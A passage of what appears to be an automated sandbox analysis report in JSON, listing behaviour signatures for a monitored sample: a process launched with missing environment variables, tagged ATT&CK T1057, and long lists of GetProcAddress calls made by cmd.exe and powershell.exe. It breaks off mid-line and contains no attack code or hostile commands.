userdomain=\"%OSUSER%-PC\", allusersprofile=\"C:\\ProgramData\", public=\"C:\\Users\\Public\", fp_no_host_check=\"NO\", temp=\"%LOCALAPPDATA%\\Temp\", os=\"Windows_NT\", programdata=\"C:\\ProgramData\", psmodulepath=\"C:\\Users\\%OSUSER%\\Documents\\WindowsPowerShell\\Modules;%PROGRAMFILES%\\WindowsPowerShell\\Modules;%WINDIR%\\system32\\WindowsPowerShell\\v1.0\\Modules\\;%PROGRAMFILES%\\AutoIt3\\AutoItX\", prompt=\"$P$G\", _clrrestrictsecattributes=\"1\", systemdrive=\"C:\", appdata=\"%USERPROFILE%\\AppData\\Roaming\", username=\"%OSUSER%\"\"\n Process \"csc.exe\" (UID: 00000000-00005220) was launched with missing environment variables: \"PROCESSOR_LEVEL, FP_NO_HOST_CHECK, SESSIONNAME, ALLUSERSPROFILE, PROCESSOR_ARCHITECTURE, PSModulePath, SystemDrive, USERNAME, PATHEXT, ProgramData, HOMEPATH, PROCESSOR_IDENTIFIER, ProgramFiles, PUBLIC, LOCALAPPDATA, USERDOMAIN, LOGONSERVER, PROMPT, APPDATA, CommonProgramFiles, Path, OS, COMPUTERNAME, PROCESSOR_REVISION, ComSpec, SystemRoot, TEMP, HOMEDRIVE, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00002724)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00002724)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter DllGetClassObjectInternal (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream_RetAddr (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetNumaHighestNodeNumber (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter InitializeAcl (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter AddAccessAllowedAce (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter AddSIDToBoundaryDescriptor (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateBoundaryDescriptorW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreatePrivateNamespaceW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter OpenPrivateNamespaceW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter DeleteBoundaryDescriptor (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WerRegisterRuntimeExceptionModule (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetSystemFileCacheSize (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter NtSetSystemInformation (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter PrivIsDllSynchronizationHeld (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap_RetAddr (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SysStringByteLen (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CryptImportKey (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CryptExportKey (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CryptGetHashParam (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CryptDestroyKey (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter NtQueryInformationThread (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformation (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateWaitableTimerExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetWaitableTimerEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter EventWriteTransfer (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetThreadErrorMode (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultLocaleName (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetUserPreferredUILanguages (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ResolveLocaleName (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CompareStringOrdinal (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetFullPathName (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSize (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfo (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter VerQueryValue (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SortGetHandle (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SortCloseHandle (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter VerLanguageName (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter VerLanguageNameW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessIdW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValue (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValueW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter OpenProcessTokenW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivilegesW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter OpenProcessW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter EnumProcessModules (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter EnumProcessModulesW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetModuleInformation (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetModuleInformationW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseName (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseNameW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetExitCodeProcess (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetExitCodeProcessW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter EnumWindowsW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegQueryValueEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetWindowThreadProcessId (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetWindowThreadProcessIdW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPath (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateFile (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformationW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WerSetFlags (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetThreadPreferredUILanguages (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetThreadPreferredUILanguagesW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetThreadPreferredUILanguages (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetThreadPreferredUILanguagesW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultLocaleNameW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariable (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WTGetSignatureInfo (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WTGetSignatureInfoA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter _WTGetSignatureInfo@24 (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinVerifyTrust (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinVerifyTrustW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WintrustCertificateTrust (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SoftpubAuthenticode (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SoftpubInitialize (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SoftpubLoadMessage (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SoftpubLoadSignature (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SoftpubCheckCert (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SoftpubCleanup (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CoCreateGuid (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetConsoleCP (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetConsoleCPW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetCurrentConsoleFontEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetCurrentConsoleFontExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetConsoleScreenBufferInfo (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetConsoleScreenBufferInfoW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetConsoleMode (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetConsoleModeW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetTokenInformationW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter LocalAllocW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter DuplicateTokenEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter DuplicateTokenExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembershipW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetConsoleMode (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetConsoleModeW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetConsoleTitle (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetConsoleTitleW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetConsoleCtrlHandler (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetConsoleCtrlHandlerW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetStdHandle (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetConsoleTitle (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetConsoleTitleW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter DllCanUnloadNow (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter MsiSIPIsMyTypeOfFile (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CoInitialize (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter StgOpenStorage (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ProcessIdToSessionId (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ImmCreateContext (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ImmDestroyContext (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter IsFileSupportedName (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter PsIsMyFileType (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter PsPutSignature (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter PsGetSignature (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WTHelperProvDataFromStateData (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WTHelperProvDataFromStateDataW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WTHelperGetProvSignerFromChain (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WTHelperGetProvSignerFromChainW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetConsoleWindow (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ShowWindow (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetEnvironmentVariable (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetEnvironmentVariableW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetProcessTimes (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetProcessTimesW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetDynamicTimeZoneInformation (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetFileMUIPath (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter LoadLibraryEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FreeLibraryW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateWellKnownSid (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipe (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateEvent (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateEventW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter _CorDllMain_RetAddr (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter _CorDllMain (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetTokenForVTableEntry (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetTargetForVTableEntry (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetTargetForVTableEntry (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetTokenForVTableEntry_RetAddr (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetTargetForVTableEntry_RetAddr (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetEnabledXStateFeatures (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter sxsJitStartup (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter jitStartup (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter getJit (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ExpandEnvironmentStrings (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ExpandEnvironmentStringsW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetModuleHandle (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WideCharToMultiByte (UID: 00000000-00006096)\n \"powershell.exe\" called 